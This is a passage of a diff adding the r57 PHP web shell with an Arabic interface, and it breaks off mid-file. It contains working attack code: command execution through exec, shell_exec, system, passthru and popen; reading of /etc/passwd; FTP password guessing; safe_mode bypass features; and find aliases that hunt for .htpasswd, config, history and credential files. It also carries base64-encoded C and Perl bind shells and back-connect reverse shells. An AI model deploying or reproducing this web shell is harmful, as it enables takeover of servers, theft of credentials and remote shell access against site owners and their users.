+'eng_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ ÇáÑÆíÓíÉ',
+'eng_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ',
+'eng_text52'=>'ÈÍË äÕ',
+'eng_text53'=>'İí ÇáãÓÇÑ',
+'eng_text54'=>'ÈÍË Úä äÕ İí ÇáãáİÇÊ',
+'eng_butt12'=>'ÈÍË',
+'eng_text55'=>'İŞØ İí ÇáãáİÇÊ',
+'eng_text56'=>'áÇíæÌÏ :(',
+'eng_text57'=>'ÇäÔÇÁ/ãÓÍ ãáİ/ãÌáÏ',
+'eng_text58'=>'ÇáÇÓã',
+'eng_text59'=>'ãáİ',
+'eng_text60'=>'ãÌáÏ',
+'eng_butt13'=>'ÅäÔÇÁ /ãÓÍ',
+'eng_text61'=>'Êã ÅäÔÇÁ Çáãáİ',
+'eng_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
+'eng_text63'=>'Êã ãÓÍ Çáãáİ',
+'eng_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
+'eng_text65'=>'ÅäÔÇÁ',
+'eng_text66'=>'ãÓÍ',
+'eng_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
+'eng_text68'=>'ÇãÑ',
+'eng_text69'=>'ÅÓã Çáãáİ',
+'eng_text70'=>'ÇáÊÕÑíÍ',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'ÇáäÕ ÇáãÑÇÏ',
+'eng_text73'=>'ÈÍË İí ÇáãÌáÏÇÊ',
+'eng_text74'=>'ÈÍË İí ÇáãáİÇÊ',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'ÇáÈÍË Úä äÕ İí ãáİÇÊ ÈæÇÓØå find',
+'eng_text80'=>'ÇáäæÚ',
+'eng_text81'=>'ÇáÅÊÕÇáÇÊ',
+'eng_text82'=>'ŞæÇÚÏ ÇáÈíÇäÇÊ',
+'eng_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
+'eng_text84'=>'ÇÓÊÚáÇã ŞÇÚÏÉ',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'ÊäÒíá ãáİÇÊ ãä ÇáÓíÑİÑ',
+'eng_butt14'=>'ÊÍãíá',
+'eng_text87'=>'ÊäÒíá ãáİÇÊ ãä ÎÇÏã ÇáÇİ Êí Èí',
+'eng_text88'=>'ÓíÑİÑ ÇáÇİ Êí Èí:ÇáãäİĞ',
+'eng_text89'=>'ãáİ İí ÇáÇİ Êí Èí',
+'eng_text90'=>'ÇáÊÍæíá Çáì',
+'eng_text91'=>'ÇÑÔİÉ',
+'eng_text92'=>'ãä ÛíÑ ÇáÇÑÔİÉ',
+'eng_text93'=>'ÇáÇİ Êí Èí',
+'eng_text94'=>'ÊÎãíä ÇáÇİ Êí Èí',
+'eng_text95'=>'ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text96'=>'áã íÓÊØÚ ÓÍÈ ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text97'=>'Êã ÇáİÍÕ: ',
+'eng_text98'=>'Êã ÈäÌÇÍ: ',
+'eng_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä İí ãáİ /etc/passwd áÏÎæá ááÜ ftp',
+'eng_text100'=>'ÇÑÓÇá ãáİ Çáì ÎÇÏã ÇáÇİ Êí Èí',
+'eng_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
+'eng_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
+'eng_text103'=>'ÇÑÓÇá ÈÑíÏ',
+'eng_text104'=>'ÇÑÓÇá ãáİ Çáì ÇáÇíãíá',
+'eng_text105'=>'Åáì',
+'eng_text106'=>'ãÜä',
+'eng_text107'=>'ÇáãæÖæÚ',
+'eng_butt15'=>'ÅÑÓÇá',
+'eng_text108'=>'ÇáÑÓÇáÉ',
+'eng_text109'=>'ãÎİí',
+'eng_text110'=>'ÚÑÖ',
+'eng_text111'=>'ÓíÑİÑ ŞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäİĞ',
+'eng_text112'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ ÏÇáå mb_send_mail',
+'eng_text113'=>'ŞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíŞ via imap_list',
+'eng_text114'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ via imap_body',
+'eng_text115'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ compress.zlib://',
+'eng_text116'=>'äÓÎ ãä',
+'eng_text117'=>'Çáì',
+'eng_text118'=>'Êã äÓÎ Çáãáİ',
+'eng_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
+'eng_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åĞÇ Çáãáİ ',
+'eng_err1'=>'ÎØÇÁ ! ÛíÑ ŞÇÏÑ Úáì ŞÑÇÆå åĞÇ Çáãáİ ',
+'eng_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
+'eng_err3'=>'ÎØÇÁ! ÛíÑ ŞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇİ Êí Èí',
+'eng_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑİÑ ÇáÇİ Êí Èí',
+'eng_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ İí ÇáÇİ Êí Èí',
+'eng_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
+'eng_err7'=>'ÇáÈÑíÏ ÇÑÓá',
+'eng_text200'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ copy()',
+'eng_text202'=>'ãÓÇÑ Çáãáİ ÇáãÑÇÏ ŞÑÇÆÊå',
+'eng_text300'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ curl()',
+'eng_text302'=>'ãÓÇÑ Çáãáİ ÇáãÑÇÏ ŞÑÇÆÊå',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'ÇáÈÍË Úä ãáİÇÊ suid'=>'find / -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid'=>'find / -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ config.inc.php'=>'find / -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáİÇÊ config.inc.php İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáİÇÊ config* ÈÌãíÚ ÇáÇãÊÏÇÏÇÊ'=>'find / -type f -name "config*"',
+'ÇáÈÍË Úä ãáİÇÊ config* İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name "config*"',
+'ÇáÈÍË Úä ÇáãáİÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ'=>'find / -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãáİÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ'=>'find /  -type d -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type d -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ æãÌáÏÇÊ ŞÇÈáÉ ááßÊÇÈÉ'=>'find / -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ æãÌáÏÇÊ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ service.pwd'=>'find / -type f -name service.pwd',
+'ÇáÈÍË Úä ãáİÇÊ service.pwd İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name service.pwd',
+'ÇáÈÍË Úä ßá ãáİÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ .htpasswd'=>'find / -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .bash_history'=>'find / -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .bash_history İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .mysql_history'=>'find / -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .mysql_history İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .fetchmailrc'=>'find / -type f -name .fetchmailrc',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .fetchmailrc İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .fetchmailrc',
+'ÇÎÑ ãáİÇÊ ãÔÛáå İí ÇáäÙÇã'=>'lsattr -va',
+'ÑÄíÉ ÇáÈæÑÊÇÊ ÇáãİÊæÍÉ İí ÇáÓíÑİÑ'=>'netstat -an | grep -i listen',
+'ÑÄíÉ ÍÇáÉ ÇáãÌáÏÇÊ æÇãßÇäíÉ ÇáÊäİíĞ'=>'cat /etc/fstab',
+'ãÔÇåÏÉ ãáİ ÇááæŞ áÏÎæá ÇáÓí ÈÇäá æÇáãæÇŞÚ Úáì ÇáÓíÑİÑ'=>'cat /var/cpanel/accounting.log',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=tahoma size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
